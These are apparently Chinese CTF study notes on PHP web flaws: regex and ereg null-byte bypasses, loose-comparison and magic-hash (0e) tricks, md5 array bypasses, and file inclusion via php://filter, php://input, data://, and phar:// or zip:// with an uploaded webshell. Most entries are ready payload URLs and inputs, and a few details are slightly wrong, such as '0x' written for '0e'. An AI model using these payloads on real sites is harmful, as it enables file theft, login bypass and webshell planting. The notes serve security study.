正則表達式
preg_match
如果在進行正則表達式匹配的時候,沒有限制字符串的開始和結束(^ 和 $),則可以存在繞過的問題
$ip = '1.1.1.1 abcd'; // 可以繞過
if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) {
die('error');
} else {
// echo('key...')
}
ereg %00 截斷
ereg 讀到 %00 的時候,就截止了
<?php
if (ereg ("^[a-zA-Z]+$", $_GET['a']) === FALSE) {
echo 'You password must be alphabet';
}
?>
a=abcd%001234,可以繞過
ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE
字符串對比解析
在這裏如果 $_GET[‘password’]爲數組,則返回值爲NULL
如果爲123 || asd || 12as || 123%00&&&**,則返回值爲true
其餘爲false
字符串比較
<?php
echo 0 == 'a' ;// a 轉換爲數字爲 0 重點注意
// 0x 開頭會被當成16進制54975581388的16進製爲 0xccccccccc
// 十六進制與整數,被轉換爲同一進制比較
'0xccccccccc' == '54975581388' ;
// 字符串在與數字比較前會自動轉換爲數字,如果不能轉換爲數字會變成0
1 == '1';
1 == '01';
10 == '1e1';
'100' == '1e2' ;
// 十六進制數與帶空格十六進制數,被轉換爲十六進制整數
'0xABCdef' == ' 0xABCdef';
echo '0010e2' == '1e3';
// 0e 開頭會被當成數字,又是等於 0*10^xxx=0
// 如果 md5 是以 0e 開頭,在做比較的時候,可以用這種方法繞過
'0e509367213418206700842008763514' == '0e481036490867661113260034900752';
'0e481036490867661113260034900752' == '0' ;
var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
?>
文件包含
http://127.0.0.1/index.php?page=upload
這種 url 很容易就能想到可能是文件包含或者僞協議讀取
http://127.0.0.1/index.php?page=php://filter/read=convert.base64-encode/resource=upload
僞協議
php://filter
讀取文件
index.php?file=php://filter/convert.base64-encode/resource=flag.php
index.php?file=php://filter/read=convert.base64-encode/resource=flag.php
php://input
寫入文件, 數據利用 POST 傳過去
index.php?file=php://input
data://
將 include 的文件流重定向到用戶控制的輸入流
test.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpO2V4aXQoKTsvLw==
可以用於控制 file_get_contents 的內容爲用戶輸入的流
$file=$_GET['file'];
$data = @file_get_contents($a,'r');
echo $data;
phar://
發現有一個文件上傳功能,無法繞過,僅能上傳jpg後綴的文件。與此同時,無法進行文件包含截斷。allow_url_include=on 的狀態下,就可以考慮phar僞協議繞過。
寫一個shell.php文件,裏面包含一句話木馬。然後,壓縮成xxx.zip。然後改名爲xxx.jpg進行上傳。最後使用phar進行包含
這裏的路徑爲上傳的 jpg 文件在服務器的路徑
/index.php?id=phar://路徑/xxx.jpg/shell
zip://
上述 phar:// 的方法也可以使用 zip://
然後吧1.php文件壓縮成zip,再把zip的後綴改爲png,上傳上去,並且可以獲得上傳上去的png的地址。
1.zip文件內僅有1.php這個文件
/php?file=zip://1.png%231.php
// 也可以嘗試不改名爲png,直接使用zip上傳測試一下
/php?file=zip://1.zip%231.php
MD5 compare漏洞
PHP在處理哈希字符串時,如果利用”!=”或”==”來對哈希值進行比較,它把每一個以”0x”開頭的哈希值都解釋爲科學計數法0的多少次方(爲0),所以如果兩個不同的密碼經過哈希以後,其哈希值都是以”0e”開頭的,那麼php將會認爲他們相同。
常見的payload有
0x01 md5(str)
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
0x02 sha1(str)
sha1('aaroZmOk')
sha1('aaK1STfY')
sha1('aaO8zKZF')
sha1('aa3OFF9m')
同時MD5不能處理數組,若有以下判斷則可用數組繞過
if(@md5($_GET['a']) == @md5($_GET['b']))
{
echo "yes";
}
//http://127.0.0.1/1.php?a[]=1&b[]=2